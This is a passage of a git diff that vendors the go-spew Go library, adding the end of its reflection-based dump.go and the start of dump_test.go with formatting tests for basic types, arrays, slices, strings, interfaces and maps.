It uses the passed reflect +// value to figure out what kind of object we are dealing with and formats it +// appropriately. It is a recursive function, however circular data structures +// are detected and handled properly. +func (d *dumpState) dump(v reflect.Value) { + // Handle invalid reflect values immediately. + kind := v.Kind() + if kind == reflect.Invalid { + d.w.Write(invalidAngleBytes) + return + } + + // Handle pointers specially. + if kind == reflect.Ptr { + d.indent() + d.dumpPtr(v) + return + } + + // Print type information unless already handled elsewhere. + if !d.ignoreNextType { + d.indent() + d.w.Write(openParenBytes) + d.w.Write([]byte(v.Type().String())) + d.w.Write(closeParenBytes) + d.w.Write(spaceBytes) + } + d.ignoreNextType = false + + // Display length and capacity if the built-in len and cap functions + // work with the value's kind and the len/cap itself is non-zero. + valueLen, valueCap := 0, 0 + switch v.Kind() { + case reflect.Array, reflect.Slice, reflect.Chan: + valueLen, valueCap = v.Len(), v.Cap() + case reflect.Map, reflect.String: + valueLen = v.Len() + } + if valueLen != 0 || !d.cs.DisableCapacities && valueCap != 0 { + d.w.Write(openParenBytes) + if valueLen != 0 { + d.w.Write(lenEqualsBytes) + printInt(d.w, int64(valueLen), 10) + } + if !d.cs.DisableCapacities && valueCap != 0 { + if valueLen != 0 { + d.w.Write(spaceBytes) + } + d.w.Write(capEqualsBytes) + printInt(d.w, int64(valueCap), 10) + } + d.w.Write(closeParenBytes) + d.w.Write(spaceBytes) + } + + // Call Stringer/error interfaces if they exist and the handle methods flag + // is enabled + if !d.cs.DisableMethods { + if (kind != reflect.Invalid) && (kind != reflect.Interface) { + if handled := handleMethods(d.cs, d.w, v); handled { + return + } + } + } + + switch kind { + case reflect.Invalid: + // Do nothing. We should never get here since invalid has already + // been handled above. 
+ + case reflect.Bool: + printBool(d.w, v.Bool()) + + case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int: + printInt(d.w, v.Int(), 10) + + case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint: + printUint(d.w, v.Uint(), 10) + + case reflect.Float32: + printFloat(d.w, v.Float(), 32) + + case reflect.Float64: + printFloat(d.w, v.Float(), 64) + + case reflect.Complex64: + printComplex(d.w, v.Complex(), 32) + + case reflect.Complex128: + printComplex(d.w, v.Complex(), 64) + + case reflect.Slice: + if v.IsNil() { + d.w.Write(nilAngleBytes) + break + } + fallthrough + + case reflect.Array: + d.w.Write(openBraceNewlineBytes) + d.depth++ + if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) { + d.indent() + d.w.Write(maxNewlineBytes) + } else { + d.dumpSlice(v) + } + d.depth-- + d.indent() + d.w.Write(closeBraceBytes) + + case reflect.String: + d.w.Write([]byte(strconv.Quote(v.String()))) + + case reflect.Interface: + // The only time we should get here is for nil interfaces due to + // unpackValue calls. + if v.IsNil() { + d.w.Write(nilAngleBytes) + } + + case reflect.Ptr: + // Do nothing. We should never get here since pointers have already + // been handled above. 
+ + case reflect.Map: + // nil maps should be indicated as different than empty maps + if v.IsNil() { + d.w.Write(nilAngleBytes) + break + } + + d.w.Write(openBraceNewlineBytes) + d.depth++ + if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) { + d.indent() + d.w.Write(maxNewlineBytes) + } else { + numEntries := v.Len() + keys := v.MapKeys() + if d.cs.SortKeys { + sortValues(keys, d.cs) + } + for i, key := range keys { + d.dump(d.unpackValue(key)) + d.w.Write(colonSpaceBytes) + d.ignoreNextIndent = true + d.dump(d.unpackValue(v.MapIndex(key))) + if i < (numEntries - 1) { + d.w.Write(commaNewlineBytes) + } else { + d.w.Write(newlineBytes) + } + } + } + d.depth-- + d.indent() + d.w.Write(closeBraceBytes) + + case reflect.Struct: + d.w.Write(openBraceNewlineBytes) + d.depth++ + if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) { + d.indent() + d.w.Write(maxNewlineBytes) + } else { + vt := v.Type() + numFields := v.NumField() + for i := 0; i < numFields; i++ { + d.indent() + vtf := vt.Field(i) + d.w.Write([]byte(vtf.Name)) + d.w.Write(colonSpaceBytes) + d.ignoreNextIndent = true + d.dump(d.unpackValue(v.Field(i))) + if i < (numFields - 1) { + d.w.Write(commaNewlineBytes) + } else { + d.w.Write(newlineBytes) + } + } + } + d.depth-- + d.indent() + d.w.Write(closeBraceBytes) + + case reflect.Uintptr: + printHexPtr(d.w, uintptr(v.Uint())) + + case reflect.UnsafePointer, reflect.Chan, reflect.Func: + printHexPtr(d.w, v.Pointer()) + + // There were not any other types at the time this code was written, but + // fall back to letting the default fmt package handle it in case any new + // types are added. + default: + if v.CanInterface() { + fmt.Fprintf(d.w, "%v", v.Interface()) + } else { + fmt.Fprintf(d.w, "%v", v.String()) + } + } +} + +// fdump is a helper function to consolidate the logic from the various public +// methods which take varying writers and config states. 
+func fdump(cs *ConfigState, w io.Writer, a ...interface{}) { + for _, arg := range a { + if arg == nil { + w.Write(interfaceBytes) + w.Write(spaceBytes) + w.Write(nilAngleBytes) + w.Write(newlineBytes) + continue + } + + d := dumpState{w: w, cs: cs} + d.pointers = make(map[uintptr]int) + d.dump(reflect.ValueOf(arg)) + d.w.Write(newlineBytes) + } +} + +// Fdump formats and displays the passed arguments to io.Writer w. It formats +// exactly the same as Dump. +func Fdump(w io.Writer, a ...interface{}) { + fdump(&Config, w, a...) +} + +// Sdump returns a string with the passed arguments formatted exactly the same +// as Dump. +func Sdump(a ...interface{}) string { + var buf bytes.Buffer + fdump(&Config, &buf, a...) + return buf.String() +} + +/* +Dump displays the passed parameters to standard out with newlines, customizable +indentation, and additional debug information such as complete types and all +pointer addresses used to indirect to the final value. It provides the +following features over the built-in printing facilities provided by the fmt +package: + + * Pointers are dereferenced and followed + * Circular data structures are detected and handled properly + * Custom Stringer/error interfaces are optionally invoked, including + on unexported types + * Custom types which only implement the Stringer/error interfaces via + a pointer receiver are optionally invoked when passing non-pointer + variables + * Byte arrays and slices are dumped like the hexdump -C command which + includes offsets, byte values in hex, and ASCII output + +The configuration options are controlled by an exported package global, +spew.Config. See ConfigState for options documentation. + +See Fdump if you would prefer dumping to an arbitrary io.Writer or Sdump to +get the formatted result as a string. +*/ +func Dump(a ...interface{}) { + fdump(&Config, os.Stdout, a...) 
+} diff --git a/vendor/github.com/davecgh/go-spew/spew/dump_test.go b/vendor/github.com/davecgh/go-spew/spew/dump_test.go new file mode 100644 index 0000000000..5aad9c7af0 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/dump_test.go @@ -0,0 +1,1042 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +/* +Test Summary: +NOTE: For each test, a nil pointer, a single pointer and double pointer to the +base test element are also tested to ensure proper indirection across all types. 
+ +- Max int8, int16, int32, int64, int +- Max uint8, uint16, uint32, uint64, uint +- Boolean true and false +- Standard complex64 and complex128 +- Array containing standard ints +- Array containing type with custom formatter on pointer receiver only +- Array containing interfaces +- Array containing bytes +- Slice containing standard float32 values +- Slice containing type with custom formatter on pointer receiver only +- Slice containing interfaces +- Slice containing bytes +- Nil slice +- Standard string +- Nil interface +- Sub-interface +- Map with string keys and int vals +- Map with custom formatter type on pointer receiver only keys and vals +- Map with interface keys and values +- Map with nil interface value +- Struct with primitives +- Struct that contains another struct +- Struct that contains custom type with Stringer pointer interface via both + exported and unexported fields +- Struct that contains embedded struct and field to same struct +- Uintptr to 0 (null pointer) +- Uintptr address of real variable +- Unsafe.Pointer to 0 (null pointer) +- Unsafe.Pointer to address of real variable +- Nil channel +- Standard int channel +- Function with no params and no returns +- Function with param and no returns +- Function with multiple params and multiple returns +- Struct that is circular through self referencing +- Structs that are circular through cross referencing +- Structs that are indirectly circular +- Type that panics in its Stringer interface +*/ + +package spew_test + +import ( + "bytes" + "fmt" + "testing" + "unsafe" + + "github.com/davecgh/go-spew/spew" +) + +// dumpTest is used to describe a test to be performed against the Dump method. +type dumpTest struct { + in interface{} + wants []string +} + +// dumpTests houses all of the tests to be performed against the Dump method. 
+var dumpTests = make([]dumpTest, 0) + +// addDumpTest is a helper method to append the passed input and desired result +// to dumpTests +func addDumpTest(in interface{}, wants ...string) { + test := dumpTest{in, wants} + dumpTests = append(dumpTests, test) +} + +func addIntDumpTests() { + // Max int8. + v := int8(127) + nv := (*int8)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "int8" + vs := "127" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Max int16. + v2 := int16(32767) + nv2 := (*int16)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "int16" + v2s := "32767" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") + + // Max int32. + v3 := int32(2147483647) + nv3 := (*int32)(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "int32" + v3s := "2147483647" + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n") + addDumpTest(nv3, "(*"+v3t+")()\n") + + // Max int64. + v4 := int64(9223372036854775807) + nv4 := (*int64)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "int64" + v4s := "9223372036854775807" + addDumpTest(v4, "("+v4t+") "+v4s+"\n") + addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n") + addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n") + addDumpTest(nv4, "(*"+v4t+")()\n") + + // Max int. 
+ v5 := int(2147483647) + nv5 := (*int)(nil) + pv5 := &v5 + v5Addr := fmt.Sprintf("%p", pv5) + pv5Addr := fmt.Sprintf("%p", &pv5) + v5t := "int" + v5s := "2147483647" + addDumpTest(v5, "("+v5t+") "+v5s+"\n") + addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n") + addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n") + addDumpTest(nv5, "(*"+v5t+")()\n") +} + +func addUintDumpTests() { + // Max uint8. + v := uint8(255) + nv := (*uint8)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "uint8" + vs := "255" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Max uint16. + v2 := uint16(65535) + nv2 := (*uint16)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "uint16" + v2s := "65535" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") + + // Max uint32. + v3 := uint32(4294967295) + nv3 := (*uint32)(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "uint32" + v3s := "4294967295" + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n") + addDumpTest(nv3, "(*"+v3t+")()\n") + + // Max uint64. + v4 := uint64(18446744073709551615) + nv4 := (*uint64)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "uint64" + v4s := "18446744073709551615" + addDumpTest(v4, "("+v4t+") "+v4s+"\n") + addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n") + addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n") + addDumpTest(nv4, "(*"+v4t+")()\n") + + // Max uint. 
+ v5 := uint(4294967295) + nv5 := (*uint)(nil) + pv5 := &v5 + v5Addr := fmt.Sprintf("%p", pv5) + pv5Addr := fmt.Sprintf("%p", &pv5) + v5t := "uint" + v5s := "4294967295" + addDumpTest(v5, "("+v5t+") "+v5s+"\n") + addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n") + addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n") + addDumpTest(nv5, "(*"+v5t+")()\n") +} + +func addBoolDumpTests() { + // Boolean true. + v := bool(true) + nv := (*bool)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "bool" + vs := "true" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Boolean false. + v2 := bool(false) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "bool" + v2s := "false" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") +} + +func addFloatDumpTests() { + // Standard float32. + v := float32(3.1415) + nv := (*float32)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "float32" + vs := "3.1415" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Standard float64. + v2 := float64(3.1415926) + nv2 := (*float64)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "float64" + v2s := "3.1415926" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") +} + +func addComplexDumpTests() { + // Standard complex64. 
+ v := complex(float32(6), -2) + nv := (*complex64)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "complex64" + vs := "(6-2i)" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Standard complex128. + v2 := complex(float64(-6), 2) + nv2 := (*complex128)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "complex128" + v2s := "(-6+2i)" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") +} + +func addArrayDumpTests() { + // Array containing standard ints. + v := [3]int{1, 2, 3} + vLen := fmt.Sprintf("%d", len(v)) + vCap := fmt.Sprintf("%d", cap(v)) + nv := (*[3]int)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "int" + vs := "(len=" + vLen + " cap=" + vCap + ") {\n (" + vt + ") 1,\n (" + + vt + ") 2,\n (" + vt + ") 3\n}" + addDumpTest(v, "([3]"+vt+") "+vs+"\n") + addDumpTest(pv, "(*[3]"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**[3]"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*[3]"+vt+")()\n") + + // Array containing type with custom formatter on pointer receiver only. 
+ v2i0 := pstringer("1") + v2i1 := pstringer("2") + v2i2 := pstringer("3") + v2 := [3]pstringer{v2i0, v2i1, v2i2} + v2i0Len := fmt.Sprintf("%d", len(v2i0)) + v2i1Len := fmt.Sprintf("%d", len(v2i1)) + v2i2Len := fmt.Sprintf("%d", len(v2i2)) + v2Len := fmt.Sprintf("%d", len(v2)) + v2Cap := fmt.Sprintf("%d", cap(v2)) + nv2 := (*[3]pstringer)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "spew_test.pstringer" + v2sp := "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t + + ") (len=" + v2i0Len + ") stringer 1,\n (" + v2t + + ") (len=" + v2i1Len + ") stringer 2,\n (" + v2t + + ") (len=" + v2i2Len + ") " + "stringer 3\n}" + v2s := v2sp + if spew.UnsafeDisabled { + v2s = "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t + + ") (len=" + v2i0Len + ") \"1\",\n (" + v2t + ") (len=" + + v2i1Len + ") \"2\",\n (" + v2t + ") (len=" + v2i2Len + + ") " + "\"3\"\n}" + } + addDumpTest(v2, "([3]"+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*[3]"+v2t+")("+v2Addr+")("+v2sp+")\n") + addDumpTest(&pv2, "(**[3]"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2sp+")\n") + addDumpTest(nv2, "(*[3]"+v2t+")()\n") + + // Array containing interfaces. + v3i0 := "one" + v3 := [3]interface{}{v3i0, int(2), uint(3)} + v3i0Len := fmt.Sprintf("%d", len(v3i0)) + v3Len := fmt.Sprintf("%d", len(v3)) + v3Cap := fmt.Sprintf("%d", cap(v3)) + nv3 := (*[3]interface{})(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "[3]interface {}" + v3t2 := "string" + v3t3 := "int" + v3t4 := "uint" + v3s := "(len=" + v3Len + " cap=" + v3Cap + ") {\n (" + v3t2 + ") " + + "(len=" + v3i0Len + ") \"one\",\n (" + v3t3 + ") 2,\n (" + + v3t4 + ") 3\n}" + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n") + addDumpTest(nv3, "(*"+v3t+")()\n") + + // Array containing bytes. 
+ v4 := [34]byte{ + 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, + 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, + 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, + 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, + 0x31, 0x32, + } + v4Len := fmt.Sprintf("%d", len(v4)) + v4Cap := fmt.Sprintf("%d", cap(v4)) + nv4 := (*[34]byte)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "[34]uint8" + v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " + + "{\n 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20" + + " |............... |\n" + + " 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30" + + " |!\"#$%&'()*+,-./0|\n" + + " 00000020 31 32 " + + " |12|\n}" + addDumpTest(v4, "("+v4t+") "+v4s+"\n") + addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n") + addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n") + addDumpTest(nv4, "(*"+v4t+")()\n") +} + +func addSliceDumpTests() { + // Slice containing standard float32 values. + v := []float32{3.14, 6.28, 12.56} + vLen := fmt.Sprintf("%d", len(v)) + vCap := fmt.Sprintf("%d", cap(v)) + nv := (*[]float32)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "float32" + vs := "(len=" + vLen + " cap=" + vCap + ") {\n (" + vt + ") 3.14,\n (" + + vt + ") 6.28,\n (" + vt + ") 12.56\n}" + addDumpTest(v, "([]"+vt+") "+vs+"\n") + addDumpTest(pv, "(*[]"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**[]"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*[]"+vt+")()\n") + + // Slice containing type with custom formatter on pointer receiver only. 
+ v2i0 := pstringer("1") + v2i1 := pstringer("2") + v2i2 := pstringer("3") + v2 := []pstringer{v2i0, v2i1, v2i2} + v2i0Len := fmt.Sprintf("%d", len(v2i0)) + v2i1Len := fmt.Sprintf("%d", len(v2i1)) + v2i2Len := fmt.Sprintf("%d", len(v2i2)) + v2Len := fmt.Sprintf("%d", len(v2)) + v2Cap := fmt.Sprintf("%d", cap(v2)) + nv2 := (*[]pstringer)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "spew_test.pstringer" + v2s := "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t + ") (len=" + + v2i0Len + ") stringer 1,\n (" + v2t + ") (len=" + v2i1Len + + ") stringer 2,\n (" + v2t + ") (len=" + v2i2Len + ") " + + "stringer 3\n}" + addDumpTest(v2, "([]"+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*[]"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**[]"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*[]"+v2t+")()\n") + + // Slice containing interfaces. + v3i0 := "one" + v3 := []interface{}{v3i0, int(2), uint(3), nil} + v3i0Len := fmt.Sprintf("%d", len(v3i0)) + v3Len := fmt.Sprintf("%d", len(v3)) + v3Cap := fmt.Sprintf("%d", cap(v3)) + nv3 := (*[]interface{})(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "[]interface {}" + v3t2 := "string" + v3t3 := "int" + v3t4 := "uint" + v3t5 := "interface {}" + v3s := "(len=" + v3Len + " cap=" + v3Cap + ") {\n (" + v3t2 + ") " + + "(len=" + v3i0Len + ") \"one\",\n (" + v3t3 + ") 2,\n (" + + v3t4 + ") 3,\n (" + v3t5 + ") \n}" + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n") + addDumpTest(nv3, "(*"+v3t+")()\n") + + // Slice containing bytes. 
+ v4 := []byte{ + 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, + 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, + 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, + 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, + 0x31, 0x32, + } + v4Len := fmt.Sprintf("%d", len(v4)) + v4Cap := fmt.Sprintf("%d", cap(v4)) + nv4 := (*[]byte)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "[]uint8" + v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " + + "{\n 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20" + + " |............... |\n" + + " 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30" + + " |!\"#$%&'()*+,-./0|\n" + + " 00000020 31 32 " + + " |12|\n}" + addDumpTest(v4, "("+v4t+") "+v4s+"\n") + addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n") + addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n") + addDumpTest(nv4, "(*"+v4t+")()\n") + + // Nil slice. + v5 := []int(nil) + nv5 := (*[]int)(nil) + pv5 := &v5 + v5Addr := fmt.Sprintf("%p", pv5) + pv5Addr := fmt.Sprintf("%p", &pv5) + v5t := "[]int" + v5s := "" + addDumpTest(v5, "("+v5t+") "+v5s+"\n") + addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n") + addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n") + addDumpTest(nv5, "(*"+v5t+")()\n") +} + +func addStringDumpTests() { + // Standard string. + v := "test" + vLen := fmt.Sprintf("%d", len(v)) + nv := (*string)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "string" + vs := "(len=" + vLen + ") \"test\"" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") +} + +func addInterfaceDumpTests() { + // Nil interface. 
+ var v interface{} + nv := (*interface{})(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "interface {}" + vs := "" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Sub-interface. + v2 := interface{}(uint16(65535)) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "uint16" + v2s := "65535" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") +} + +func addMapDumpTests() { + // Map with string keys and int vals. + k := "one" + kk := "two" + m := map[string]int{k: 1, kk: 2} + klen := fmt.Sprintf("%d", len(k)) // not kLen to shut golint up + kkLen := fmt.Sprintf("%d", len(kk)) + mLen := fmt.Sprintf("%d", len(m)) + nilMap := map[string]int(nil) + nm := (*map[string]int)(nil) + pm := &m + mAddr := fmt.Sprintf("%p", pm) + pmAddr := fmt.Sprintf("%p", &pm) + mt := "map[string]int" + mt1 := "string" + mt2 := "int" + ms := "(len=" + mLen + ") {\n (" + mt1 + ") (len=" + klen + ") " + + "\"one\": (" + mt2 + ") 1,\n (" + mt1 + ") (len=" + kkLen + + ") \"two\": (" + mt2 + ") 2\n}" + ms2 := "(len=" + mLen + ") {\n (" + mt1 + ") (len=" + kkLen + ") " + + "\"two\": (" + mt2 + ") 2,\n (" + mt1 + ") (len=" + klen + + ") \"one\": (" + mt2 + ") 1\n}" + addDumpTest(m, "("+mt+") "+ms+"\n", "("+mt+") "+ms2+"\n") + addDumpTest(pm, "(*"+mt+")("+mAddr+")("+ms+")\n", + "(*"+mt+")("+mAddr+")("+ms2+")\n") + addDumpTest(&pm, "(**"+mt+")("+pmAddr+"->"+mAddr+")("+ms+")\n", + "(**"+mt+")("+pmAddr+"->"+mAddr+")("+ms2+")\n") + addDumpTest(nm, "(*"+mt+")()\n") + addDumpTest(nilMap, "("+mt+") \n") + + 